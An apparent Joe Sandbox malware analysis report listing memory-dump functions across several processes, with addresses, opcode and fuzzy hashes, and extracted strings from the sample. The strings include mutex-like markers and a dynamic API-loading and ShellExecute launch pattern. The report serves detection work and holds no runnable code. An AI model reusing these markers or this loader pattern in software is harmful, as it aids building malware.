                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2701830651.0000000002470000.00000040.00000001.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2470000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: 67d63b4dd4d174f4b3618e9c0657c8f0b95244ccc94c9fb8f24a9bd8ac5ee9f1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66B14871A012898FEF10CF68CC44BEA37A5FF54304F485926DC19AF3A1D375AA95CB4A
                                                                                                                                                                                                                                    Function 02470AAA Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2701830651.0000000002470000.00000040.00000001.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2470000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c8f7c87faae4f4379b3fccb25882370ad6c9884bf352f412aa7a75093acdeb8a
                                                                                                                                                                                                                                    • Instruction ID: f02d5a4a019a4fe1082e6d4396d87cd63ebb174ce7be6db6294db7bbf4ffdc63
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8f7c87faae4f4379b3fccb25882370ad6c9884bf352f412aa7a75093acdeb8a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63D0A9B02012088FDF648F388808478BAE4EF89320F11057CE8CAEB364E7B49C409B01

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 0292D765 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 164COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 771B4100.KERNEL32(00000000), ref: 0292D9AD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: B4100
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 1198398010-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: f3e18b701a2665ffbc890014d253314daf676f587aec20da851641e2095f1c47
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC616F71640298ABEF10DF60CC49FEA3768EF44B05F540915FE09BE1E8D7B16648CB6A
                                                                                                                                                                                                                                    Function 0292D9C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 771B4100.KERNEL32(00000000), ref: 0292D9AD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: B4100
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 1198398010-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: b7f08c2462e42ed19ddadd69959d975ea4adf7e587905513024c4399d1b4ea1a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5511DE75245289ABEF50DEA0CD0DFDD37ACAB44B05F540415FA09FE0E8DAB19204877B
                                                                                                                                                                                                                                    Function 02470260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2701830651.0000000002470000.00000040.00000001.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2470000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: e19f43a3198405d88e6cb7796c4d38b6a839ff8eb8bcd9f5d325bd1a073fbbf3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85111E32244288ABEF51DEA08D4DFEA37A8EB54B05F041415BA19FE1E0DBB19644876B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00F60005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000024.00000002.2654653222.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_36_2_f60000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: bac0f8e0aefe37438037734f56ba5b17bf556c11f8fdc671dc31a9468cac92bf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB617E71640288ABEF10DFA0CC49FEB3768EF05711F640515FE09BE1E1DAB16644AB6E
                                                                                                                                                                                                                                    Function 00F606D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000024.00000002.2654653222.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_36_2_f60000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: e2c79bb9501d0788d93122cb9c453c413aa447e8d1bf1422ef3893417cd7bbb2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09B15D35A002898FEF10CF64CC44BAA37A5FF44314F684925DC0DAF2A1DB75AA94DF4A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00F60260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000024.00000002.2654653222.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_36_2_f60000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 81a5f24e2804395085d074ae308754b3c9dcc53489e5f93cc7f17a8b37518073
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94112D31640388ABEF11DEA08D5DFEE37A8EF84B01F140414FE09EE0E0DAB19644972B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 021D0005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000025.00000002.2677593413.00000000021D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_37_2_21d0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 18cf4e8ffa6d5e1fdaf33276b6c4df4a58afb196bb27337d92c14bad6cc7c70c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8615D71680289EFEF10DFA0CC49FEA3769EB49705F440515EE09BE1E0D7B1A644CB6A
                                                                                                                                                                                                                                    Function 021D06D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000025.00000002.2677593413.00000000021D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_37_2_21d0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: f7f4537e511440429bfb201f5fa98d111f3321894d305e84287ca45a4c3453e0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0B15875A40289CFEF14CF28CC44BA937A5FF48304F494925DC4DAF2A1D375AA94CB4A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 021D0260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000025.00000002.2677593413.00000000021D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_37_2_21d0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: ed609604bb0da0e062d4b5f13c65b0fb7864e1f16bcbb1aa97afd53e4cd3196e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F911DE71284289ABEF51DEA08D4DFED37A8AB48B05F444415BA09EE0E0DBB19244876B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 02930005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000026.00000002.2667245487.0000000002930000.00000040.00000001.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_2930000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 2ce2aec4a7ea9f7d5582d1011f79a2bddd11d17517aaf7c17983151558088577
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77614C71640288ABEF12DFA0CC49FEA3769FB44B05F444515EE09BE1E0D7B1A644CB6E
                                                                                                                                                                                                                                    Function 029306D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000026.00000002.2667245487.0000000002930000.00000040.00000001.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_2930000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: 58c6a6bba8a5290a86da6a80e87ea126674567faddccb0e6aa3da2631790b142
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3B13A75A002898FEF11CF28CD44BA937A9FF44304F484965DD0DAF2A1D375AA95CF4A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 02930260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000026.00000002.2667245487.0000000002930000.00000040.00000001.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_2930000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: b6867b410bbe437e970cd85a80def07f2a0e900bfc90f082c096ade2aa96ca97
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E811DB71244289ABEF51DEA08D4DFEA37ACAB84B05F444415BA09EE0E0DBB19244876B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00840005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000027.00000002.2655772191.0000000000840000.00000040.00000001.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_39_2_840000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 33a3d2747010540da02fd86a61e4120a8d8455c2a0738374a256d383d95e0b8b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3615B7164028DABEF11DFA0CC49FAA3768FB04B05F540515EF09FE1E1D6B1AA448B6A
                                                                                                                                                                                                                                    Function 008406D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000027.00000002.2655772191.0000000000840000.00000040.00000001.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_39_2_840000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: 5ca16baf1fcc214f912464accd33bec6c22feba7bcd52a37bb0fe61b138a4f0a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB11771A0028D8FEB10CF64CD44BAA37A5FF54304F484925DE09EF2A1D376AA94CF4A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00840260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000027.00000002.2655772191.0000000000840000.00000040.00000001.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_39_2_840000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 4b069400db47b4a1ff45baa07a4df046a7a0933d88db813cedff5c431b5d36ac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE11DE7124428DABEF51DEA08D4DFDA37A8EB44B05F444415BB09EE0E0DAB196448B6B

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 02460005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000028.00000002.2664821229.0000000002460000.00000040.00000001.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_40_2_2460000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 322f2006442065e9a7c422ccfc2392a33a59eeec636f992f4e3b5d8c9836bb12
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0613A71640288ABEF11DFA0CC4DFFA3769FF04705F445516EA09AE2E0D7B1A6448B6B
                                                                                                                                                                                                                                    Function 024606D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000028.00000002.2664821229.0000000002460000.00000040.00000001.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_40_2_2460000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: 1e54d2e9eda2d86251620d540fc416aeef8032faea5b0f54b34e617daedb03a8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEB14D75A002898FEF10CF64CC48BBA37A5FF54305F485926DC09AF3A1D375AA95CB4A

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 02460260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000028.00000002.2664821229.0000000002460000.00000040.00000001.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_40_2_2460000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 0b1358873976e0c6f790891279a1f28cf6665a178556859b9a2d0f3b9369b1af
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77111B31240388ABEF11DEA08D4DFFE37A8AF84B05F041415BA09EE1E0DBB19644872B